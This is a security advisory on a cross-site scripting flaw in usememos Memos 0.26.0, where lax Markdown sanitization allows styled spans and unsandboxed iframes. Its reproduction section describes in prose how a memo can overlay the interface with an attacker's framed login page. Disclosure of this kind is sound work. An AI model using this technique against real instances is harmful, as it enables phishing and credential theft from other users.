usememos Memos Cross-Site Scripting Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in usememos Memos version 0.26.0. This issue allows remote attackers to inject malicious scripts that could be executed in the context of the user's browser. The vulnerability arises from the application's Markdown rendering component, which improperly sanitizes user-generated content. Specifically, the 'SANITIZE_SCHEMA' configuration permits harmful 'style' attributes on 'span' elements and unsandboxed 'iframe' embeds. As a result, an authenticated user could craft a memo that, when viewed by others, overlays the entire application interface with attacker-controlled content, potentially leading to credential theft by spoofing login prompts.

Impact

Exploitation of this vulnerability could result in cross-site scripting, allowing for the injection of malicious scripts that are executed in the context of the user's browser. This could be used to steal credentials by spoofing login prompts, especially in shared instances of the application.

Reproduction

To reproduce this vulnerability, an authenticated user can create a memo that includes a 'span' element styled with 'position: fixed', 'top', 'left', 'width', 'height', and a high 'z-index' value. This span can then contain an 'iframe' element that loads a page controlled by the attacker, such as a login spoofing site. Once the memo is shared and opened by another user, the injected content will cover the application interface, creating a convincing phishing scenario.